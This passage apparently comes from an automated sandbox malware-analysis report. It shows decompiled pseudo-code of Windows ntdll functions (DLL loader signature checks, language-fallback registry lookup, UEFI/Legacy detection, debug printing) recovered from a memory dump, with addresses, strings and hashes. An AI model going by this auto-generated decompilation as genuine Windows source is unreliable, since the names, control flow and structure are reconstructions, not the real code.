0x04b19ca3
0x04b19ca9
0x04b19ca9
0x00000000
0x04b19ca9
0x04b19ca3
0x00000000
0x04b19c97
0x04ac897d
0x00000000
0x04ac8974
0x04ac8988
0x04ac8992
0x04ac8996
0x00000000
0x04ac8996
0x04ac894c
0x00000000
0x04ac8870
0x04ac887b
0x04ac887d
0x04ac887f
0x04ac8881
0x04ac8884
0x04ac8884
0x04ac8886
0x04ac8889
0x04ac888c
0x04ac888e
0x04ac8891
0x04ac8891
0x04ac8898
0x00000000
0x00000000
0x04ac889a
0x04ac889b
0x04ac889e
0x00000000
0x00000000
0x04ac88a0
0x04ac88a8
0x04ac88b0
0x04ac88b2
0x04ac88d3
0x04ac88d5
0x00000000
0x04ac88d7
0x04ac88db
0x04ac88dc
0x04ac88e0
0x04ac88e8
0x04ac88ee
0x04ac88f0
0x04ac88f3
0x04ac88fc
0x04ac8901
0x04ac8906
0x04ac890c
0x04ac890c
0x04ac890f
0x04ac8916
0x04ac8917
0x04ac8918
0x04ac8919
0x04ac891a
0x04ac891f
0x04ac8921
0x04b19c52
0x04b19c55
0x04b19c5b
0x04b19cac
0x04b19cc0
0x04b19cc0
0x04b19c55
0x04ac8927
0x04ac8927
0x04ac892f
0x04ac8933
0x00000000
0x04ac88f5
0x04ac88f5
0x00000000
0x04ac88f7
0x04ac88f7
0x04ac88fa
0x00000000
0x00000000
0x00000000
0x00000000
0x04ac88fa
0x04ac88f5
0x04ac88f3
0x00000000
0x04ac88d5
0x00000000
0x04ac88b2
0x04ac88c9
0x00000000
0x04ac88c9
0x04ac887f
0x04ac886a
0x04ac8857
0x04ac8852
0x04ac88bf
0x04ac88bf
0x04ac87aa
0x04ac87ad
0x04ac87ae
0x04ac87b4
0x04ac87b5
0x04ac87b6
0x04ac87b8
0x04ac87bd
0x04ac87c1
0x04ac87f4
0x04ac87fa
0x00000000
0x00000000
0x00000000
0x04ac87c1
0x00000000

Strings

LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 04B19C18
minkernel\ntdll\ldrsnap.c, xrefs: 04B19C28
LdrpDoPostSnapWork, xrefs: 04B19C1E

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 0-1948996284
Opcode ID: 08241fcd8ce70c4257c9f4e98f9e4812e59010e49fd5a6363d066d2d2dfb8d61
Instruction ID: 3c4e1c20759b463070c95728299a79b7e163e4e8206a6ec04e0d0905545eefbc
Opcode Fuzzy Hash: 08241fcd8ce70c4257c9f4e98f9e4812e59010e49fd5a6363d066d2d2dfb8d61
Instruction Fuzzy Hash: B19118B1A00216EFEF58EF59C881ABA77B5FF44346B5440ADE805AB650E734FD01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04AC7E41, Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E04AC7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E04ACCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E04ABC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x4ba5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E04B35510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x4ba5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E04AD7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E04AD7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E04B37016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E04AD7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E04AD7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E04B37016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E04AEA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E04ABB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x04ac7e4c
0x04ac7e50
0x04ac7e55
0x04ac7e58
0x04ac7e5d
0x04ac7e71
0x04ac7f33
0x04ac7e77
0x04ac7e77
0x04ac7e79
0x04ac7e79
0x04ac7e7e
0x04ac7f45
0x04b19848
0x00000000
0x04b19848
0x04ac7f4e
0x04ac7f53
0x04ac7f5a
0x00000000
0x00000000
0x04b1985a
0x04b19862
0x04b19866
0x00000000
0x04b1986c
0x00000000
0x04b1986c
0x04ac7e84
0x04ac7e84
0x04ac7e8d
0x04b19871
0x04ac7eb8
0x04ac7ec0
0x04ac7ec0
0x04ac7e9a
0x04b1987e
0x00000000
0x00000000
0x04b19884
0x04b1988b
0x04b198a7
0x04b198ac
0x04b198b1
0x04b198b6
0x04b198b8
0x04b198b8
0x04b198b9
0x00000000
0x04b198b9
0x04ac7ea0
0x04ac7ea7
0x00000000
0x00000000
0x04ac7eac
0x04ac7eb1
0x04ac7ec6
0x04ac7ed0
0x04b198cc
0x04ac7ed6
0x04ac7ed6
0x04ac7ed6
0x04ac7ede
0x04ac7ee3
0x04b198e3
0x04b198f0
0x04b19902
0x04b198f2
0x04b198fb
0x04b198fb
0x04b19907
0x04b1991d
0x04b1991d
0x04b19907
0x04b198e3
0x04ac7ef0
0x04ac7f14
0x04ac7f14
0x04ac7f1e
0x04b19946
0x04ac7f24
0x04ac7f24
0x04ac7f24
0x04ac7f2c
0x04b1996a
0x04b19975
0x04b19975
0x04b1997e
0x04b19993
0x04b19993
0x04b1997e
0x00000000
0x04ac7ef2
0x04ac7efc
0x04ac7f0a
0x04ac7f0e
0x04b19933
0x00000000
0x04b19933
0x00000000
0x04ac7f0e
0x00000000
0x00000000
0x00000000
0x04ac7eb1

Strings

LdrpCompleteMapModule, xrefs: 04B19898
minkernel\ntdll\ldrmap.c, xrefs: 04B198A2
Could not validate the crypto signature for DLL %wZ, xrefs: 04B19891

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: ffeed7d0843350cfffdb406229acb7aa454dbb126aa7ebf56a00c075e0a94941
Instruction ID: fac1f0eb5d72bb79d1415737e7b481607c56345a29e84120b804576febda32e5
Opcode Fuzzy Hash: ffeed7d0843350cfffdb406229acb7aa454dbb126aa7ebf56a00c075e0a94941
Instruction Fuzzy Hash: F251F07A600782DBEB26CB69C954B6ABBE4EF01754F440599E8529B7E1D730FD00CF90

Uniqueness

Uniqueness Score: -1.00%

Function 04ABE620, Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E04ABE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E04ABF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E04AF95D0();
						}
						if(_t78 != 0) {
							L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E04AFFA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E04AFBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E04AF9600();
					if(_t97 < 0) {
						goto L6;
					}
					E04AFBB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L04ABF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E04AFBB40(_t83, _t102 + 0x24, _t78);
								if(L04AC43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E04AFBB40(_t84, _t102 + 0x24, _t94);
									if(L04AC43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x04abe620
0x04abe628
0x04abe62f
0x04abe631
0x04abe635
0x04abe637
0x04abe63e
0x04b15503
0x04b15503
0x04abe64c
0x04abe64c
0x04abe651
0x00000000
0x00000000
0x04abe661
0x04abe665
0x04b1542a
0x04abe715
0x04abe71a
0x04abe71c
0x04abe720
0x04abe720
0x04abe727
0x04abe736
0x04abe736
0x04abe743
0x04abe743
0x04abe673
0x04abe678
0x04abe67d
0x04abe682
0x04abe685
0x04abe692
0x04abe69b
0x04abe6a3
0x04abe6ad
0x04abe6b1
0x04abe6b2
0x04abe6bb
0x04abe6bf
0x04abe6c0
0x04abe6c8
0x04abe6cc
0x04abe6d5
0x04abe6d9
0x00000000
0x00000000
0x04abe6e5
0x04abe6ea
0x04abe6f9
0x04abe70b
0x04abe70f
0x04b15439
0x04b1545e
0x04b1545e
0x00000000
0x04b1545e
0x04b1543b
0x04b1543e
0x04b15440
0x04b15445
0x04b15472
0x04b15475
0x04b1548d
0x04b15493
0x04b154a9
0x00000000
0x00000000
0x04b154ab
0x04b154b4
0x04b154bc
0x04b154c8
0x04b154de
0x04b154fb
0x04b154e0
0x04b154e6
0x04b154eb
0x04b154eb
0x04b154de
0x00000000
0x04b154bc
0x04b15477
0x04b1547a
0x04b15480
0x04b15483
0x04b15486
0x04b1548b
0x00000000
0x00000000
0x00000000
0x04b1548b
0x00000000
0x00000000
0x00000000
0x00000000
0x04b15447
0x04b15447
0x04b15447
0x04b15447
0x04b1544e
0x00000000
0x00000000
0x04b15450
0x04b15452
0x04b15455
0x04b1545a
0x00000000
0x00000000
0x00000000
0x04b1545c
0x04b1546a
0x04b1546d
0x04b1546f
0x00000000
0x04b1546f
0x04abe70f

Strings

@, xrefs: 04ABE6C0
InstallLanguageFallback, xrefs: 04ABE6DB
\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 04ABE68C

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: c347fe2ad66fccaea3e1ea69457b1dd3254075de3e989746b720e2a3bb5883ff
Instruction ID: ac294ed05c30fbc5abd0246315ee3f1fb579817ccd8f90d6a7e942d50edb3837
Opcode Fuzzy Hash: c347fe2ad66fccaea3e1ea69457b1dd3254075de3e989746b720e2a3bb5883ff
Instruction Fuzzy Hash: 5151AFB6508315ABD720DF68C840AABB3E8FF88714F44096EF985D7250F734EA4487A2

Uniqueness

Uniqueness Score: -1.00%

Function 04B351BE, Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E04B351BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x4b905f0);
				E04B0D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E04ACEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E04B353CA(0);
						return E04B0D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E04AFF3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E04AD3690(1, _t117, 0x4a91810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E04AFAA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L04AD4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E04AFAA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E04B3500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E04AF9860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x04b351be
0x04b351c3
0x04b351c8
0x04b351cd
0x04b351d0
0x04b351d3
0x04b351d8
0x04b351db
0x04b351de
0x04b351e0
0x04b351e3
0x04b351e6
0x04b351e8
0x04b35342
0x04b35351
0x04b35356
0x04b3535a
0x04b35360
0x04b35363
0x04b35366
0x04b35369
0x04b35369
0x04b3536b
0x04b3536b
0x04b35370
0x04b353a3
0x04b353a4
0x04b353a6
0x04b353ab
0x04b353ab
0x04b353ae
0x04b353ae
0x04b353b5
0x04b353bf
0x04b353bf
0x04b35375
0x04b35396
0x04b353a0
0x04b353a0
0x00000000
0x04b35396
0x04b35377
0x04b35379
0x04b3537f
0x04b3538c
0x04b35390
0x00000000
0x04b35390
0x04b351ee
0x04b351f1
0x04b35301
0x04b35310
0x04b35315
0x04b35318
0x04b3531b
0x04b35320
0x04b3532e
0x04b35331
0x00000000
0x04b35331
0x04b35328
0x04b35329
0x00000000
0x04b35329
0x04b351fa
0x04b35235
0x04b35236
0x04b35239
0x04b3523f
0x04b35240
0x04b35241
0x04b35242
0x04b35246
0x04b35247
0x04b3524e
0x04b35251
0x04b35267
0x04b35269
0x04b3526e
0x04b3527d
0x04b3527e
0x04b35281
0x04b35282
0x04b35287
0x04b35288
0x04b3528a
0x04b3528f
0x04b35294
0x00000000
0x00000000
0x04b3529a
0x04b3529c
0x04b3529e
0x04b3529e
0x04b352a4
0x04b352b0
0x00000000
0x00000000
0x04b352ba
0x04b352bc
0x04b352bc
0x04b352d4
0x04b352d9
0x04b352dc
0x04b352e1
0x00000000
0x00000000
0x04b352e7
0x04b352f4
0x00000000
0x04b352f4
0x04b35270
0x00000000
0x04b35270
0x04b351fc
0x04b351fd
0x04b35202
0x04b35203
0x04b35205
0x04b3520a
0x04b3520f
0x00000000
0x00000000
0x04b3521b
0x04b35226
0x04b3522b
0x04b3521d
0x04b3521d
0x04b35222
0x04b35222
0x04b3522d
0x00000000

Strings

Legacy, xrefs: 04B35226
UEFI, xrefs: 04B3521D

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: b7fb3fe3320c2140ffa175e1e08dfab2d286ce9d7ff61c1a0e4fb6f2e59b4aad
Instruction ID: 02044910cf6ec1aceccfdf817061677a709f9f025c59e74c442bcde240d2e98b
Opcode Fuzzy Hash: b7fb3fe3320c2140ffa175e1e08dfab2d286ce9d7ff61c1a0e4fb6f2e59b4aad
Instruction Fuzzy Hash: AF5160B1E00609AFDB24DFA9C980BADBBF8FF48705F54406DE55AEB251D671A900CB50

Uniqueness

Uniqueness Score: -1.00%

Function 04ABB171, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E04ABB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x4b8f7a8);
				E04B0D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E04B0D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E04AFD000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E04AFF3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L04B0DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E04AFB280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E04AFB7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E04AFE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
